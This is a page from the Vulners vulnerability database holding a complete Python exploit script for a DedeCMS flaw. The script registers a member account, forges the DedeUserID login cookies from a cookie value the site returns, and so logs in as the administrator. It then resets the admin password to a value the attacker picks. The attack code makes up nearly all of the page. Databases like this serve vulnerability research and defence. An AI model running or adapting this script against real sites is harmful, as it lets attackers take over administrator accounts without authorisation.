Vulners
Lucene search
DeDecms 任意用户登录,管理员密码重置漏洞
# coding=utf-8
import requests
import re
if __name__ == "__main__":
dede_host = "http://127.0.0.1/"
oldpwd = '123456'
newpwd = "cnvdcnvd"
s = requests.Session()
if '系统关闭了会员功能' in requests.get(dede_host + 'member/reg_new.php').content:
exit('The system has closed the member function .Can not attack !!!')
else:
print "The system opened the membership function, I wish you good luck !!"
headers = {"Referer": dede_host + "member/reg_new.php"}
rs = s.get(dede_host + 'include/vdimgck.php').content
file = open('1.jpg', "wb")
file.write(rs)
file.close()
vdcode = raw_input("Please enter the registration verification code : ")
userid = '0000001'
uname = '0000001'
userpwd = '123456'
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0)",
"Content-Type": "application/x-www-form-urlencoded"}
data = "dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid={userid}&uname={uname}&userpwd={userpwd}&userpwdok={userpwd}&email=0000001%400000001.com&safequestion=0&safeanswer=&sex=%E7%94%B7&vdcode={vdcode}&agree=".format(
userid=userid, uname=uname, userpwd=userpwd, vdcode=vdcode)
rs = s.post(dede_host + '/member/reg_new.php', data=data, headers=headers)
if "验证码错误" in rs.content:
exit("Verification code error, account registration failed")
elif '注册成功' in rs.content:
print 'registration success !!'
rs = s.get(dede_host + "/member/index.php?uid={userid}".format(userid=userid))
if "资料尚未通过审核" in rs.content:
exit("User information has not been approved !!!") # 会员使用权限开通状态(-10 邮件验证 -1 手工审核, 0 没限制):
searchObj = re.search(r'last_vid__ckMd5=(.*?);', rs.headers['Set-Cookie'], re.M | re.I)
last_vid__ckMd5 = searchObj.group(1)
s.cookies['DedeUserID'] = userid
s.cookies['DedeUserID__ckMd5'] = last_vid__ckMd5
rs = s.get(dede_host + "/member/index.php")
if "class=\"userName\">admin</a>" in rs.text:
print "Administrator login successful !!"
headers = {"Referer": dede_host + "member/edit_baseinfo.php"}
rs = s.get(dede_host + 'include/vdimgck.php').content
file = open('2.jpg', "wb")
file.write(rs)
file.close()
vdcode = raw_input("Please enter the verification code : ")
data = {"dopost": "save", "uname": "admin", "oldpwd": oldpwd, "userpwd": newpwd, "userpwdok": newpwd,
"safequestion": "0", "newsafequestion": "0", "sex": "男", "email": "[email protected]", "vdcode": vdcode}
rs = s.post(dede_host + '/member/edit_baseinfo.php', data=data)
if "成功更新你的基本资料" in rs.content:
print "Administrator password modified successfully !!"
print "The new administrator password is : " + newpwd
else:
print "attack fail"
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Jan 2018 00:00Current
7.1High risk
Vulners AI Score7.1